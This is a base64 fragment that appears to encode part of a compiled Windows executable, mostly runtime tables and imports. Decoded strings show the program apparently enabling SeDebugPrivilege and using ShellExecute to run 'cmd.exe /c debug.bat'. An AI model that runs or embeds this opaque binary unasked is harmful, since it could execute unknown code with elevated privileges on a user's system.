AG0AZQAgAHUAbgBrAG4AbwB3AG4APgAAAAAAUgB1AG4AdABpAG0AZQAgAEUAcgByAG8AcgAhAAoACgBQAHIAbwBnAHIAYQBtADoAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQAhACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAaAAoACgAKAAoACAAIAAgACAAIAAg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c3RydWN0b3IgaXRlcmF0b3InAAAAAABgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAAAAAAAAYG9tbmkgY2FsbHNpZycAACBkZWxldGVbXQAAACBuZXdbXQAAAAAAAGBsb2NhbCB2ZnRhYmxlIGNvbnN0cnVjdG9yIGNsb3N1cmUnAAAAAABgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAAAAAAGB1ZHQgcmV0dXJuaW5nJwBgY29weSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAAAAAGBlaCB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZWggdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAGBlaCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAAAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAAAAAAGB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAABgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYHNjYWxhciBkZWxldGluZyBkZXN0cnVjdG9yJwAAAABgZGVmYXVsdCBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAGB2ZWN0b3IgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYHZiYXNlIGRlc3RydWN0b3InAAAAAAAAYHN0cmluZycAAAAAAAAAAGBsb2NhbCBzdGF0aWMgZ3VhcmQnAAAAAGB0eXBlb2YnAAAAAAAAAABgdmNhbGwnAGB2YnRhYmxlJwAAAAAAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AAAAoKQAALAAAAD49AAA+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AAAAsKIAAAAAAAC+ogAAAAAAAMyiAAAAAAAA5qIAAAAAAAD2ogAAAAAAAAyjAAAAAAAAJqMAAAAAAAAyowAAAAAAAESjAAAAAAAAWKMAAAAAAABwowAAAAAAAIijAAAAAAAAlKMAAAAAAACeowAAAAAAAKqjAAAAAAAAvKMAAAAAAADKowAAAAAAANqjAAAAAAAA5qMAAAAAAAD8owAAAAAAAAikAAAAAAAAGKQAAAAAAAAupAAAAAAAAAAAAAAAAAAAAqAAAAAAAAAAAAAAAAAAAMYBR2V0Q3VycmVudFByb2Nlc3MAwARTbGVlcABSAENsb3NlSGFuZGxlAEtFUk5FTDMyLmRsbAAA9wFPcGVuUHJvY2Vzc1Rva2VuAACWAUxvb2t1cFByaXZpbGVnZVZhbHVlQQAfAEFkanVzdFRva2VuUHJpdmlsZWdlcwBBRFZBUEkzMi5kbGwAAB4BU2hlbGxFeGVjdXRlQQBTSEVMTDMyLmRsbADLAUdldEN1cnJlbnRUaHJlYWRJZAAAWwFGbHNTZXRWYWx1ZQCMAUdldENvbW1hbmRMaW5lQQDOBFRlcm1pbmF0ZVByb2Nlc3MAAOIEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAACzBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgACA0lzRGVidWdnZXJQcmVzZW50ACYEUnRsVmlydHVhbFVud2luZAAAHwRSdGxMb29rdXBGdW5jdGlvbkVudHJ5AAAYBFJ0bENhcHR1cmVDb250ZXh0ACUEUnRsVW53aW5kRXgA7gBFbmNvZGVQb2ludGVyAFoBRmxzR2V0VmFsdWUAWQFGbHNGcmVlAIAEU2V0TGFzdEVycm9yAAAIAkdldExhc3RFcnJvcgAAWAFGbHNBbGxvYwAA1wJIZWFwRnJlZQAATAJHZXRQcm9jQWRkcmVzcwAAHgJHZXRNb2R1bGVIYW5kbGVXAAAfAUV4aXRQcm9jZXNzAMsARGVjb2RlUG9pbnRlcgB8BFNldEhhbmRsZUNvdW50AABrAkdldFN0ZEhhbmRsZQAA6wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APoBR2V0RmlsZVR5cGUAagJHZXRTdGFydHVwSW5mb1cA0gBEZWxldGVDcml0aWNhbFNlY3Rpb24AGQJHZXRNb2R1bGVGaWxlTmFtZUEAAGcBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAIAVXaWRlQ2hhclRvTXVsdGlCeXRlAOEBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAA2wJIZWFwU2V0SW5mb3JtYXRpb24AAKoCR2V0VmVyc2lvbgAA1QJIZWFwQ3JlYXRlAADWAkhlYXBEZXN0cm95AKkDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAmgJHZXRUaWNrQ291bnQAAMcBR2V0Q3VycmVudFByb2Nlc3NJZACAAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lANMCSGVhcEFsbG9jALQDUmFpc2VFeGNlcHRpb24AACEEUnRsUGNUb0ZpbGVIZWFkZXIAOwNMZWF2ZUNyaXRpY2FsU2VjdGlvbgAA8gBFbnRlckNyaXRpY2FsU2VjdGlvbgAAeAFHZXRDUEluZm8AbgFHZXRBQ1AAAD4CR2V0T0VNQ1AAAAwDSXNWYWxpZENvZGVQYWdlANoCSGVhcFJlQWxsb2MAQQNMb2FkTGlicmFyeVcAADQFV3JpdGVGaWxlABoCR2V0TW9kdWxlRmlsZU5hbWVXAADcAkhlYXBTaXplAAAvA0xDTWFwU3RyaW5nVwAAaQNNdWx0aUJ5dGVUb1dpZGVDaGFyAHACR2V0U3RyaW5nVHlwZVcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyot8tmSsAAM1dINJm1P//6HMAgAEAAAAAAAAAAAAAAC4/QVZiYWRfYWxsb2NAc3RkQEAAAAAAAOhzAIABAAAAAAAAAAAAAAAuP0FWZXhjZXB0aW9uQHN0ZEBAAP///////////////4AKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6HMAgAEAAAAAAAAAAAAAAC4/QVZ0eXBlX2luZm9AQAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAAAADYdwCAAQAAANR3AIABAAAA0HcAgAEAAADMdwCAAQAAAMh3AIABAAAAxHcAgAEAAADAdwCAAQAAALh3AIABAAAAsHcAgAEAAACodwCAAQAAAJh3AIABAAAAiHcAgAEAAAB8dwCAAQAAAHB3AIABAAAAbHcAgAEAAABodwCAAQAAAGR3AIABAAAAYHcAgAEAAABcdwCAAQAAAFh3AIABAAAAVHcAgAEAAABQdwCAAQAAAEx3AIABAAAASHcAgAEAAABEdwCAAQAAAEB3AIABAAAAOHcAgAEAAAAodwCAAQAAABx3AIABAAAAFHcAgAEAAABcdwCAAQAAAAx3AIABAAAABHcAgAEAAAD8dgCAAQAAAPB2AIABAAAA6HYAgAEAAADYdgCAAQAAAMh2AIABAAAAwHYAgAEAAAC8dgCAAQAAALB2AIABAAAAmHYAgAEAAACIdgCAAQAAAAkEAAABAAAAAAAAAAAAAACAdgCAAQAAAHh2AIABAAAAcHYAgAEAAABodgCAAQAAAGB2AIABAAAAWHYAgAEAAABQdgCAAQAAAEB2AIABAAAAMHYAgAEAAAAgdgCAAQAAAAh2AIABAAAA8HUAgAEAAADgdQCAAQAAAMh1AIABAAAAwHUAgAEAAAC4dQCAAQAAALB1AIABAAAAqHUAgAEAAACgdQCAAQAAAJh1AIABAAAAkHUAgAEAAACIdQCAAQAAAIB1AIABAAAAeHUAgAEAAABwdQCAAQAAAGh1AIABAAAAWHUAgAEAAABAdQCAAQAAADB1AIABAAAAIHUAgAEAAACgdQCAAQAAABB1AIABAAAAAHUAgAEAAADwdACAAQAAANh0AIABAAAAyHQAgAEAAACwdACAAQAAAJh0AIABAAAAjHQAgAEAAACEdACAAQAAAHB0AIABAAAASHQAgAEAAAAwdACAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAILMAgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgswCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCzAIABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAILMAgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgswCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYL4AgAEAAAAAAAAAAAAAAAAAAAAAAAAA4IMAgAEAAABwiACAAQAAAPCJAIABAAAAMLMAgAEAAADwtQCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5egAAAAAAAEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA